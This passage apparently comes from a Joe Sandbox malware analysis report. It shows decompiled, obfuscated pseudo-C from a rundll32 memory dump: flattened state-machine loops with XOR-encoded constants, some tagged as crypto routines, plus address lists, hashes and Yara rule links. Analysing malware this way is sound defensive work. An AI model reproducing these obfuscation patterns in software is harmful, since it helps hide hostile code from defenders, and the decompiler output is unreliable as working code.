				_v1144 = _v1144 * 0x4d;
				_v1144 = _v1144 >> 0x10;
				_v1144 = _v1144 ^ 0x0002b082;
				_v1068 = 0x3ad283;
				_v1068 = _v1068 + 0xc4d8;
				_v1068 = _v1068 ^ 0x003ad5e6;
				_v1148 = 0xbbdd96;
				_v1148 = _v1148 / _t273;
				_v1148 = _v1148 + 0xffff10a8;
				_v1148 = _v1148 + 0xdbb9;
				_v1148 = _v1148 ^ 0x00089235;
				_v1084 = 0xf8cace;
				_v1084 = _v1084 ^ 0x230d76f6;
				_v1084 = _v1084 ^ 0x23f29212;
				_v1140 = 0x18cea;
				_v1140 = _v1140 << 3;
				_v1140 = _v1140 << 0xa;
				_v1140 = _v1140 + 0xffff66c6;
				_v1140 = _v1140 ^ 0x3196ba0a;
				_v1104 = 0x64ea4d;
				_v1104 = _v1104 >> 0xe;
				_v1104 = _v1104 << 0x10;
				_v1104 = _v1104 ^ 0x01951052;
				_v1120 = 0x40e961;
				_v1120 = _v1120 ^ 0xb7fb83c2;
				_v1120 = _v1120 + 0xb75e;
				_v1120 = _v1120 ^ 0xb7bbc099;
				_v1096 = 0x7779e0;
				_v1096 = _v1096 | 0x86983bb4;
				_v1096 = _v1096 ^ 0x86f0c1f2;
				_v1100 = 0xda5543;
				_v1100 = _v1100 + 0xffff2368;
				_v1100 = _v1100 + 0xffff6302;
				_v1100 = _v1100 ^ 0x00d61d50;
				_v1132 = 0x843ae5;
				_v1132 = _v1132 + 0xae05;
				_v1132 = _v1132 >> 9;
				_v1132 = _v1132 | 0xb52a1de5;
				_v1132 = _v1132 ^ 0xb5269cc0;
				_v1064 = 0x4bdca1;
				_t274 = 0x36;
				_v1064 = _v1064 * 0x2d;
				_v1064 = _v1064 ^ 0x0d50802d;
				_v1076 = 0xc70263;
				_v1076 = _v1076 ^ 0xed1c16c4;
				_v1076 = _v1076 ^ 0xeddf4f32;
				_v1108 = 0x3676a5;
				_v1108 = _v1108 << 0x10;
				_v1108 = _v1108 << 8;
				_v1108 = _v1108 ^ 0xa501f64e;
				_v1088 = 0x1a5bc1;
				_v1088 = _v1088 / _t274;
				_v1088 = _v1088 ^ 0x00023ab9;
				_v1092 = 0xcce8ca;
				_v1092 = _v1092 + 0xffff41cd;
				_v1092 = _v1092 ^ 0x00c96fdb;
				_v1072 = 0x26dee9;
				_t275 = 0x31;
				_v1072 = _v1072 * 0x7c;
				_v1072 = _v1072 ^ 0x12da7d33;
				_v1124 = 0xc51f8;
				_v1124 = _v1124 * 0x7c;
				_v1124 = _v1124 | 0x22e20644;
				_v1124 = _v1124 + 0xffff053d;
				_v1124 = _v1124 ^ 0x27f3e63a;
				_v1080 = 0x33633f;
				_v1080 = _v1080 / _t275;
				_v1080 = _v1080 ^ 0x000716b7;
				E002E5C73(_t275);
				do {
					while(_t310 != 0xc63ed) {
						if(_t310 == 0x5b9c87d) {
							_push(_v1104);
							_push(_v1140);
							_t263 = E002EDCF7(_v1084, 0x2d1060, __eflags);
							_t264 = E002ED25E(_v1120);
							_t282 =  *0x2f3e10; // 0x0
							_t265 =  *0x2f3e10; // 0x0
							E002E453F(_v1100, __eflags, _v1132, _t263, _v1064, _t265 + 0x23c, _t282 + 0x1c, _v1076, _v1108, _t264, _t282 + 0x1c);
							_t268 = E002DA8B0(_v1088, _t263, _v1092);
							_t314 =  &(_t314[0xa]);
							_t310 = 0xc63ed;
							continue;
						} else {
							if(_t310 == 0xb516bbb) {
								_t310 = 0xc84e726;
								continue;
							} else {
								_t319 = _t310 - 0xc84e726;
								if(_t310 == 0xc84e726) {
									_push(_v1128);
									_push(_v1152);
									_t269 = E002EDCF7(_v1136, 0x2d1000, _t319);
									_t289 =  *0x2f3e10; // 0x0
									_t306 =  *0x2f3e10; // 0x0
									E002D47CE(_t306 + 0x23c, _v1156, _t289 + 0x1c, _v1164, _v1112, _t269, _t289 + 0x1c, _v1116, _v1144);
									_t268 = E002DA8B0(_v1068, _t269, _v1148);
									_t314 =  &(_t314[9]);
									_t310 = 0x5b9c87d;
									continue;
								}
							}
						}
						goto L9;
					}
					_push(_v1080);
					_push( &_v1040);
					_push(_v1124);
					E002F13AD(_v1072,  &_v520, __eflags);
					_t314 =  &(_t314[3]);
					_t310 = 0xafb2886;
					L9:
					__eflags = _t310 - 0xafb2886;
				} while (__eflags != 0);
				return _t268;
			}


















































                                                                                                                                  0x002e66ca
                                                                                                                                  0x002e66d0
                                                                                                                                  0x002e66d7
                                                                                                                                  0x002e66df
                                                                                                                                  0x002e66e7
                                                                                                                                  0x002e66ef
                                                                                                                                  0x002e66f7
                                                                                                                                  0x002e66ff
                                                                                                                                  0x002e6711
                                                                                                                                  0x002e6716
                                                                                                                                  0x002e671c
                                                                                                                                  0x002e6724
                                                                                                                                  0x002e6729
                                                                                                                                  0x002e6731
                                                                                                                                  0x002e6736
                                                                                                                                  0x002e673e
                                                                                                                                  0x002e674b
                                                                                                                                  0x002e674c
                                                                                                                                  0x002e6750
                                                                                                                                  0x002e6758
                                                                                                                                  0x002e6760
                                                                                                                                  0x002e6768
                                                                                                                                  0x002e6770
                                                                                                                                  0x002e6778
                                                                                                                                  0x002e6780
                                                                                                                                  0x002e6788
                                                                                                                                  0x002e6790
                                                                                                                                  0x002e6798
                                                                                                                                  0x002e67a0
                                                                                                                                  0x002e67a8
                                                                                                                                  0x002e67b0
                                                                                                                                  0x002e67b8
                                                                                                                                  0x002e67c0
                                                                                                                                  0x002e67c8
                                                                                                                                  0x002e67d0
                                                                                                                                  0x002e67d8
                                                                                                                                  0x002e67e0
                                                                                                                                  0x002e67e8
                                                                                                                                  0x002e67ed
                                                                                                                                  0x002e67f2
                                                                                                                                  0x002e67f7
                                                                                                                                  0x002e67ff
                                                                                                                                  0x002e6807
                                                                                                                                  0x002e680f
                                                                                                                                  0x002e6814
                                                                                                                                  0x002e681c
                                                                                                                                  0x002e6824
                                                                                                                                  0x002e682c
                                                                                                                                  0x002e6834
                                                                                                                                  0x002e683c
                                                                                                                                  0x002e6844
                                                                                                                                  0x002e6851
                                                                                                                                  0x002e6855
                                                                                                                                  0x002e685a
                                                                                                                                  0x002e6862
                                                                                                                                  0x002e686a
                                                                                                                                  0x002e6872
                                                                                                                                  0x002e687a
                                                                                                                                  0x002e6888
                                                                                                                                  0x002e688c
                                                                                                                                  0x002e6894
                                                                                                                                  0x002e689c
                                                                                                                                  0x002e68a4
                                                                                                                                  0x002e68ac
                                                                                                                                  0x002e68b4
                                                                                                                                  0x002e68bc
                                                                                                                                  0x002e68c4
                                                                                                                                  0x002e68c9
                                                                                                                                  0x002e68ce
                                                                                                                                  0x002e68d8
                                                                                                                                  0x002e68e0
                                                                                                                                  0x002e68e8
                                                                                                                                  0x002e68ed
                                                                                                                                  0x002e68f2
                                                                                                                                  0x002e68fa
                                                                                                                                  0x002e6902
                                                                                                                                  0x002e690a
                                                                                                                                  0x002e6912
                                                                                                                                  0x002e691a
                                                                                                                                  0x002e6922
                                                                                                                                  0x002e692a
                                                                                                                                  0x002e6932
                                                                                                                                  0x002e693a
                                                                                                                                  0x002e6942
                                                                                                                                  0x002e694a
                                                                                                                                  0x002e6952
                                                                                                                                  0x002e695a
                                                                                                                                  0x002e6962
                                                                                                                                  0x002e6967
                                                                                                                                  0x002e696f
                                                                                                                                  0x002e6977
                                                                                                                                  0x002e6986
                                                                                                                                  0x002e6989
                                                                                                                                  0x002e698d
                                                                                                                                  0x002e6995
                                                                                                                                  0x002e699d
                                                                                                                                  0x002e69a5
                                                                                                                                  0x002e69ad
                                                                                                                                  0x002e69b5
                                                                                                                                  0x002e69ba
                                                                                                                                  0x002e69bf
                                                                                                                                  0x002e69c7
                                                                                                                                  0x002e69d7
                                                                                                                                  0x002e69db
                                                                                                                                  0x002e69e3
                                                                                                                                  0x002e69eb
                                                                                                                                  0x002e69f3
                                                                                                                                  0x002e69fb
                                                                                                                                  0x002e6a08
                                                                                                                                  0x002e6a09
                                                                                                                                  0x002e6a0d
                                                                                                                                  0x002e6a15
                                                                                                                                  0x002e6a22
                                                                                                                                  0x002e6a26
                                                                                                                                  0x002e6a2e
                                                                                                                                  0x002e6a36
                                                                                                                                  0x002e6a3e
                                                                                                                                  0x002e6a4c
                                                                                                                                  0x002e6a50
                                                                                                                                  0x002e6a60
                                                                                                                                  0x002e6a74
                                                                                                                                  0x002e6a74
                                                                                                                                  0x002e6a82
                                                                                                                                  0x002e6b0d
                                                                                                                                  0x002e6b16
                                                                                                                                  0x002e6b1e
                                                                                                                                  0x002e6b2f
                                                                                                                                  0x002e6b34
                                                                                                                                  0x002e6b47
                                                                                                                                  0x002e6b6a
                                                                                                                                  0x002e6b7c
                                                                                                                                  0x002e6b81
                                                                                                                                  0x002e6b84
                                                                                                                                  0x00000000
                                                                                                                                  0x002e6a88
                                                                                                                                  0x002e6a8e
                                                                                                                                  0x002e6b06
                                                                                                                                  0x00000000
                                                                                                                                  0x002e6a90
                                                                                                                                  0x002e6a90
                                                                                                                                  0x002e6a92
                                                                                                                                  0x002e6a98
                                                                                                                                  0x002e6aa1
                                                                                                                                  0x002e6aa9
                                                                                                                                  0x002e6aba
                                                                                                                                  0x002e6ad2
                                                                                                                                  0x002e6ae5
                                                                                                                                  0x002e6af7
                                                                                                                                  0x002e6afc
                                                                                                                                  0x002e6aff
                                                                                                                                  0x00000000
                                                                                                                                  0x002e6aff
                                                                                                                                  0x002e6a92
                                                                                                                                  0x002e6a8e
                                                                                                                                  0x00000000
                                                                                                                                  0x002e6a82
                                                                                                                                  0x002e6b8e
                                                                                                                                  0x002e6b99
                                                                                                                                  0x002e6b9a
                                                                                                                                  0x002e6ba9
                                                                                                                                  0x002e6bae
                                                                                                                                  0x002e6bb1
                                                                                                                                  0x002e6bb3
                                                                                                                                  0x002e6bb3
                                                                                                                                  0x002e6bb3
                                                                                                                                  0x002e6bc5

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: <E$?c3$Md$a@$yw
                                                                                                                                  • API String ID: 0-2084988834
                                                                                                                                  • Opcode ID: f8e1bd6eccdf858b7517a355da554131bf3f872f1437b3637ffb919dd2b282de
                                                                                                                                  • Instruction ID: f114222784f08292bd2d21ee158f55f7a30a94da6309127868e32ccba808dec6
                                                                                                                                  • Opcode Fuzzy Hash: f8e1bd6eccdf858b7517a355da554131bf3f872f1437b3637ffb919dd2b282de
                                                                                                                                  • Instruction Fuzzy Hash: 4EC120724083809FD368DF26D58A81BBBF2FBD4758F508A1DF5A596260D3B58909CF43
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 002D7735 Relevance: 6.4, Strings: 5, Instructions: 191COMMONCrypto
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 90%
                                                                                                                                  			E002D7735(void* __edx, intOrPtr _a4, signed int* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v44;
				void* _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				unsigned int _v112;
				unsigned int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				void* __ecx;
				void* _t163;
				signed int _t176;
				void* _t188;
				signed int _t205;
				signed int* _t207;
				void* _t209;
				void* _t210;

				_t186 = _a4;
				_t207 = _a8;
				_push(_a16);
				_push(_a12);
				_push(_t207);
				_push(_a4);
				_push(__edx);
				E002E20B9(_t163);
				_v60 = 0x524796;
				_t210 = _t209 + 0x18;
				asm("stosd");
				_t188 = 0x9c25eae;
				asm("stosd");
				asm("stosd");
				_v76 = 0x29f01;
				_v76 = _v76 | 0x94be009d;
				_v76 = _v76 ^ 0x94be9f9d;
				_v108 = 0xafa956;
				_v108 = _v108 + 0x628;
				_v108 = _v108 ^ 0xf539d3de;
				_v108 = _v108 ^ 0xf5927b2e;
				_v92 = 0x300c11;
				_v92 = _v92 ^ 0x95f7d427;
				_v92 = _v92 ^ 0x95c19bc8;
				_v116 = 0x7fd72e;
				_v116 = _v116 >> 0x10;
				_v116 = _v116 + 0x5d9b;
				_v116 = _v116 ^ 0x0001fda4;
				_v88 = 0x25a82f;
				_t205 = 0x1b;
				_v88 = _v88 * 0x72;
				_v88 = _v88 ^ 0x10cad58f;
				_v100 = 0xf91ce5;
				_v100 = _v100 >> 0xc;
				_v100 = _v100 ^ 0x71d91e41;
				_v100 = _v100 ^ 0x71d9c87d;
				_v136 = 0x5a524;
				_v136 = _v136 ^ 0x65d544fc;
				_v136 = _v136 / _t205;
				_v136 = _v136 + 0xdad4;
				_v136 = _v136 ^ 0x03c43220;
				_v68 = 0xd5537a;
				_v68 = _v68 + 0xffffd52f;
				_v68 = _v68 ^ 0x00d2b66c;
				_v128 = 0x59397b;
				_v128 = _v128 ^ 0x5dfc0cc3;
				_v128 = _v128 + 0x56f6;
				_v128 = _v128 + 0xff83;
				_v128 = _v128 ^ 0x5dafd3d4;
				_v104 = 0x85edfa;
				_v104 = _v104 | 0x32b3baf7;
				_v104 = _v104 ^ 0x32b12396;
				_v112 = 0x4c4fc6;
				_v112 = _v112 + 0xbf9f;
				_v112 = _v112 >> 1;
				_v112 = _v112 ^ 0x002f2047;
				_v120 = 0xc21a43;
				_v120 = _v120 | 0x0781619f;
				_v120 = _v120 ^ 0x30a197e6;
				_v120 = _v120 ^ 0x376a3e6d;
				_v84 = 0xaf6a80;
				_v84 = _v84 + 0xffff12f3;
				_v84 = _v84 ^ 0x00ae6f5f;
				_v64 = 0x7bdfb0;
				_v64 = _v64 >> 2;
				_v64 = _v64 ^ 0x00114c08;
				_v96 = 0x6b35de;
				_v96 = _v96 * 0x60;
				_v96 = _v96 ^ 0x283b6418;
				_v124 = 0x52b9d2;
				_v124 = _v124 | 0x40c5122c;
				_v124 = _v124 << 8;
				_v124 = _v124 >> 0x10;
				_v124 = _v124 ^ 0x0001910d;
				_v132 = 0x44d0f9;
				_v132 = _v132 * 0x29;
				_v132 = _v132 + 0xf17;
				_v132 = _v132 * 0x65;
				_v132 = _v132 ^ 0x592f3fb2;
				_v72 = 0xc75ad6;
				_v72 = _v72 ^ 0xe0bef3a1;
				_v72 = _v72 ^ 0xe072572c;
				_v80 = 0xa6c1d6;
				_v80 = _v80 + 0xc8d;
				_v80 = _v80 ^ 0x00ac29a9;
				do {
					while(_t188 != 0xe27b71) {
						if(_t188 == 0x372e88b) {
							_push(_t188);
							_push(_t188);
							_t176 = E002D7FF2(_t207[1]);
							 *_t207 = _t176;
							__eflags = _t176;
							if(__eflags != 0) {
								_t188 = 0xe27b71;
								continue;
							}
						} else {
							if(_t188 == 0x93f98fe) {
								_t207[1] = E002F0C14(_t186);
								_t188 = 0x372e88b;
								continue;
							} else {
								if(_t188 == 0x9c25eae) {
									_t188 = 0x93f98fe;
									 *_t207 =  *_t207 & 0x00000000;
									_t207[1] = _v76;
									continue;
								} else {
									if(_t188 == 0xa0c9f29) {
										_t146 =  &_v112; // 0x2f2047
										E002E0DAF(_v68,  &_v44, _v128,  *((intOrPtr*)(_t186 + 0x48)), _v104,  *_t146);
										_t210 = _t210 + 0x10;
										_t188 = 0xc7f60b3;
										continue;
									} else {
										if(_t188 == 0xc7f60b3) {
											_t144 =  &_v84; // 0xe072572c
											E002F0E3A( &_v44, _v120, __eflags,  *_t144, _v64, _v96, _t186 + 0x14);
											_t210 = _t210 + 0x10;
											_t188 = 0xcf8cba1;
											continue;
										} else {
											_t219 = _t188 - 0xcf8cba1;
											if(_t188 != 0xcf8cba1) {
												goto L17;
											} else {
												E002F0E3A( &_v44, _v124, _t219, _v132, _v72, _v80, _t186 + 0x38);
											}
										}
									}
								}
							}
						}
						L9:
						return 0 |  *_t207 != 0x00000000;
					}
					E002D3DBC( &_v44, _t207, _v88, _v100, _v136);
					_t210 = _t210 + 0xc;
					_t188 = 0xa0c9f29;
					L17:
					__eflags = _t188 - 0x560a718;
				} while (__eflags != 0);
				goto L9;
			}

































                                                                                                                                  0x002d773c
                                                                                                                                  0x002d7745
                                                                                                                                  0x002d774d
                                                                                                                                  0x002d7754
                                                                                                                                  0x002d775b
                                                                                                                                  0x002d775c
                                                                                                                                  0x002d775d
                                                                                                                                  0x002d775f
                                                                                                                                  0x002d7764
                                                                                                                                  0x002d7772
                                                                                                                                  0x002d7775
                                                                                                                                  0x002d7778
                                                                                                                                  0x002d777f
                                                                                                                                  0x002d7780
                                                                                                                                  0x002d7781
                                                                                                                                  0x002d7789
                                                                                                                                  0x002d7791
                                                                                                                                  0x002d7799
                                                                                                                                  0x002d77a1
                                                                                                                                  0x002d77a9
                                                                                                                                  0x002d77b1
                                                                                                                                  0x002d77b9
                                                                                                                                  0x002d77c1
                                                                                                                                  0x002d77c9
                                                                                                                                  0x002d77d1
                                                                                                                                  0x002d77d9
                                                                                                                                  0x002d77de
                                                                                                                                  0x002d77e6
                                                                                                                                  0x002d77ee
                                                                                                                                  0x002d77fb
                                                                                                                                  0x002d77fc
                                                                                                                                  0x002d7800
                                                                                                                                  0x002d7808
                                                                                                                                  0x002d7810
                                                                                                                                  0x002d7815
                                                                                                                                  0x002d781d
                                                                                                                                  0x002d7825
                                                                                                                                  0x002d782d
                                                                                                                                  0x002d783b
                                                                                                                                  0x002d783f
                                                                                                                                  0x002d7847
                                                                                                                                  0x002d784f
                                                                                                                                  0x002d7857
                                                                                                                                  0x002d785f
                                                                                                                                  0x002d7867
                                                                                                                                  0x002d786f
                                                                                                                                  0x002d7877
                                                                                                                                  0x002d787f
                                                                                                                                  0x002d7887
                                                                                                                                  0x002d788f
                                                                                                                                  0x002d7897
                                                                                                                                  0x002d789f
                                                                                                                                  0x002d78a7
                                                                                                                                  0x002d78af
                                                                                                                                  0x002d78b7
                                                                                                                                  0x002d78bb
                                                                                                                                  0x002d78c3
                                                                                                                                  0x002d78cb
                                                                                                                                  0x002d78d3
                                                                                                                                  0x002d78db
                                                                                                                                  0x002d78e3
                                                                                                                                  0x002d78eb
                                                                                                                                  0x002d78f3
                                                                                                                                  0x002d78fb
                                                                                                                                  0x002d7903
                                                                                                                                  0x002d7908
                                                                                                                                  0x002d7910
                                                                                                                                  0x002d791d
                                                                                                                                  0x002d7921
                                                                                                                                  0x002d792e
                                                                                                                                  0x002d793b
                                                                                                                                  0x002d7943
                                                                                                                                  0x002d7948
                                                                                                                                  0x002d794d
                                                                                                                                  0x002d7955
                                                                                                                                  0x002d7962
                                                                                                                                  0x002d7966
                                                                                                                                  0x002d7973
                                                                                                                                  0x002d7977
                                                                                                                                  0x002d797f
                                                                                                                                  0x002d7987
                                                                                                                                  0x002d798f
                                                                                                                                  0x002d7997
                                                                                                                                  0x002d799f
                                                                                                                                  0x002d79a7
                                                                                                                                  0x002d79af
                                                                                                                                  0x002d79af
                                                                                                                                  0x002d79bd
                                                                                                                                  0x002d7aac
                                                                                                                                  0x002d7aad
                                                                                                                                  0x002d7aae
                                                                                                                                  0x002d7ab3
                                                                                                                                  0x002d7ab7
                                                                                                                                  0x002d7ab9
                                                                                                                                  0x002d7abf
                                                                                                                                  0x00000000
                                                                                                                                  0x002d7abf
                                                                                                                                  0x002d79c3
                                                                                                                                  0x002d79c5
                                                                                                                                  0x002d7a90
                                                                                                                                  0x002d7a93
                                                                                                                                  0x00000000
                                                                                                                                  0x002d79cb
                                                                                                                                  0x002d79d1
                                                                                                                                  0x002d7a7c
                                                                                                                                  0x002d7a7e
                                                                                                                                  0x002d7a81
                                                                                                                                  0x00000000
                                                                                                                                  0x002d79d7
                                                                                                                                  0x002d79dd
                                                                                                                                  0x002d7a4f
                                                                                                                                  0x002d7a66
                                                                                                                                  0x002d7a6b
                                                                                                                                  0x002d7a6e
                                                                                                                                  0x00000000
                                                                                                                                  0x002d79df
                                                                                                                                  0x002d79e5
                                                                                                                                  0x002d7a35
                                                                                                                                  0x002d7a3d
                                                                                                                                  0x002d7a42
                                                                                                                                  0x002d7a45
                                                                                                                                  0x00000000
                                                                                                                                  0x002d79e7
                                                                                                                                  0x002d79e7
                                                                                                                                  0x002d79ed
                                                                                                                                  0x00000000
                                                                                                                                  0x002d79f3
                                                                                                                                  0x002d7a0b
                                                                                                                                  0x002d7a10
                                                                                                                                  0x002d79ed
                                                                                                                                  0x002d79e5
                                                                                                                                  0x002d79dd
                                                                                                                                  0x002d79d1
                                                                                                                                  0x002d79c5
                                                                                                                                  0x002d7a13
                                                                                                                                  0x002d7a24
                                                                                                                                  0x002d7a24
                                                                                                                                  0x002d7ad8
                                                                                                                                  0x002d7add
                                                                                                                                  0x002d7ae0
                                                                                                                                  0x002d7ae5
                                                                                                                                  0x002d7ae5
                                                                                                                                  0x002d7ae5
                                                                                                                                  0x00000000

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: ,Wr$G /$m>j7$q{${9Y
                                                                                                                                  • API String ID: 0-2956538602
                                                                                                                                  • Opcode ID: aad4c5470bf923e8e08ddaad0ee87e401980107f56092e5079a3be882124f178
                                                                                                                                  • Instruction ID: d369fa177baa781b4be42722def4ae0ff18c537a7f75d0a9b783065ea024b6f1
                                                                                                                                  • Opcode Fuzzy Hash: aad4c5470bf923e8e08ddaad0ee87e401980107f56092e5079a3be882124f178
                                                                                                                                  • Instruction Fuzzy Hash: 4D914E710193419FD368CF65D98692BBBF1FBC4748F10991DF29296220E3B9CA588F43
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 002D4816 Relevance: 6.4, Strings: 5, Instructions: 180COMMONCrypto
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 91%
                                                                                                                                  			E002D4816(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				void* _t164;
				void* _t179;
				signed int _t190;
				signed int _t191;
				signed int _t192;
				signed int _t193;
				void* _t196;
				void* _t213;
				void* _t214;
				signed int* _t217;

				_push(_a16);
				_t213 = __edx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E002E20B9(_t164);
				_v4 = _v4 & 0x00000000;
				_t217 =  &(( &_v88)[6]);
				_v16 = 0xc0a747;
				_v12 = 0xade381;
				_t214 = 0;
				_v8 = 0x11050f;
				_t196 = 0x5adc597;
				_v84 = 0xdf9e69;
				_v84 = _v84 >> 2;
				_v84 = _v84 + 0xffff5795;
				_v84 = _v84 >> 5;
				_v84 = _v84 ^ 0x0001b9f8;
				_v68 = 0xf2d8cd;
				_v68 = _v68 << 6;
				_v68 = _v68 | 0xe3b79c6a;
				_v68 = _v68 + 0xec5a;
				_v68 = _v68 ^ 0xffb8abc5;
				_v40 = 0x5d8c34;
				_v40 = _v40 >> 9;
				_v40 = _v40 ^ 0x40002ec6;
				_v28 = 0x37ca39;
				_v28 = _v28 | 0x456668c2;
				_v28 = _v28 ^ 0x0577eafb;
				_v80 = 0xd16358;
				_v80 = _v80 ^ 0xe637ce9d;
				_t190 = 0x68;
				_v80 = _v80 * 0x4b;
				_v80 = _v80 << 2;
				_v80 = _v80 ^ 0x965c2e63;
				_v56 = 0xfc1806;
				_v56 = _v56 + 0xffffb57d;
				_v56 = _v56 | 0x299c1b97;
				_v56 = _v56 ^ 0x29fc2736;
				_v44 = 0x81586;
				_v44 = _v44 | 0xba5390c4;
				_v44 = _v44 ^ 0xba584850;
				_v60 = 0x52e6aa;
				_v60 = _v60 >> 0xa;
				_v60 = _v60 * 0x28;
				_v60 = _v60 ^ 0x00066c4e;
				_v48 = 0x7a334;
				_v48 = _v48 + 0xfffff5af;
				_v48 = _v48 ^ 0x0009652d;
				_v52 = 0x3bf8e8;
				_v52 = _v52 / _t190;
				_v52 = _v52 ^ 0x00025bcb;
				_v64 = 0xacc490;
				_t191 = 0x6f;
				_v64 = _v64 / _t191;
				_v64 = _v64 ^ 0xce7acdce;
				_v64 = _v64 ^ 0xce756fa5;
				_v88 = 0x557b83;
				_v88 = _v88 ^ 0xfc4fd146;
				_v88 = _v88 ^ 0x87bb4e9a;
				_v88 = _v88 ^ 0x18fbc6ce;
				_v88 = _v88 ^ 0x635c68ef;
				_v24 = 0xa24557;
				_t192 = 0x23;
				_v24 = _v24 / _t192;
				_v24 = _v24 ^ 0x00019ec3;
				_v72 = 0x274d3f;
				_v72 = _v72 + 0x3236;
				_v72 = _v72 + 0x71a1;
				_v72 = _v72 + 0x1749;
				_v72 = _v72 ^ 0x0028bc49;
				_v32 = 0x96c762;
				_t193 = 0x44;
				_v32 = _v32 / _t193;
				_v32 = _v32 ^ 0x000b5918;
				_v76 = 0x2f082c;
				_v76 = _v76 + 0x52f3;
				_v76 = _v76 + 0x7ae4;
				_v76 = _v76 ^ 0x81d2744f;
				_v76 = _v76 ^ 0x81f68fa5;
				_v36 = 0x9357ce;
				_v36 = _v36 + 0xfffffb26;
				_v36 = _v36 ^ 0x009b03e6;
				do {
					while(_t196 != 0x4d42949) {
						if(_t196 == 0x5adc597) {
							_t196 = 0x4d42949;
							continue;
						} else {
							if(_t196 == 0x78e32ab) {
								E002E847F(_v24, _t213, _v28 | _v68, _v72, _a8, _v32, _t214, _v76, _v36,  &_v20);
							} else {
								if(_t196 != 0xf2775cd) {
									goto L11;
								} else {
									_push(_t196);
									_push(_t196);
									_t214 = E002D7FF2(_v20 + _v20);
									if(_t214 != 0) {
										_t196 = 0x78e32ab;
										continue;
									}
								}
							}
						}
						L14:
						return _t214;
					}
					_t179 = E002E847F(_v80, _t213, _v40 | _v84, _v56, _a8, _v44, 0, _v60, _v48,  &_v20);
					_t217 =  &(_t217[8]);
					if(_t179 == 0) {
						_t196 = 0xc32537b;
						goto L11;
					} else {
						_t196 = 0xf2775cd;
						continue;
					}
					goto L14;
					L11:
				} while (_t196 != 0xc32537b);
				goto L14;
			}



































                                                                                                                                  0x002d481d
                                                                                                                                  0x002d4821
                                                                                                                                  0x002d4823
                                                                                                                                  0x002d4827
                                                                                                                                  0x002d482b
                                                                                                                                  0x002d482f
                                                                                                                                  0x002d4830
                                                                                                                                  0x002d4831
                                                                                                                                  0x002d4836
                                                                                                                                  0x002d483b
                                                                                                                                  0x002d483e
                                                                                                                                  0x002d4848
                                                                                                                                  0x002d4850
                                                                                                                                  0x002d4852
                                                                                                                                  0x002d485a
                                                                                                                                  0x002d485f
                                                                                                                                  0x002d4867
                                                                                                                                  0x002d486c
                                                                                                                                  0x002d4874
                                                                                                                                  0x002d4879
                                                                                                                                  0x002d4881
                                                                                                                                  0x002d4889
                                                                                                                                  0x002d488e
                                                                                                                                  0x002d4896
                                                                                                                                  0x002d489e
                                                                                                                                  0x002d48a6
                                                                                                                                  0x002d48ae
                                                                                                                                  0x002d48b3
                                                                                                                                  0x002d48bb
                                                                                                                                  0x002d48c3
                                                                                                                                  0x002d48cb
                                                                                                                                  0x002d48d3
                                                                                                                                  0x002d48db
                                                                                                                                  0x002d48ea
                                                                                                                                  0x002d48ed
                                                                                                                                  0x002d48f1
                                                                                                                                  0x002d48f6
                                                                                                                                  0x002d48fe
                                                                                                                                  0x002d4906
                                                                                                                                  0x002d490e
                                                                                                                                  0x002d4916
                                                                                                                                  0x002d491e
                                                                                                                                  0x002d4926
                                                                                                                                  0x002d492e
                                                                                                                                  0x002d4936
                                                                                                                                  0x002d493e
                                                                                                                                  0x002d4948
                                                                                                                                  0x002d494c
                                                                                                                                  0x002d4954
                                                                                                                                  0x002d495c
                                                                                                                                  0x002d4964
                                                                                                                                  0x002d496c
                                                                                                                                  0x002d497c
                                                                                                                                  0x002d4980
                                                                                                                                  0x002d4988
                                                                                                                                  0x002d4994
                                                                                                                                  0x002d4997
                                                                                                                                  0x002d499b
                                                                                                                                  0x002d49a3
                                                                                                                                  0x002d49ab
                                                                                                                                  0x002d49b3
                                                                                                                                  0x002d49bb
                                                                                                                                  0x002d49c3
                                                                                                                                  0x002d49cb
                                                                                                                                  0x002d49d5
                                                                                                                                  0x002d49e3
                                                                                                                                  0x002d49e8
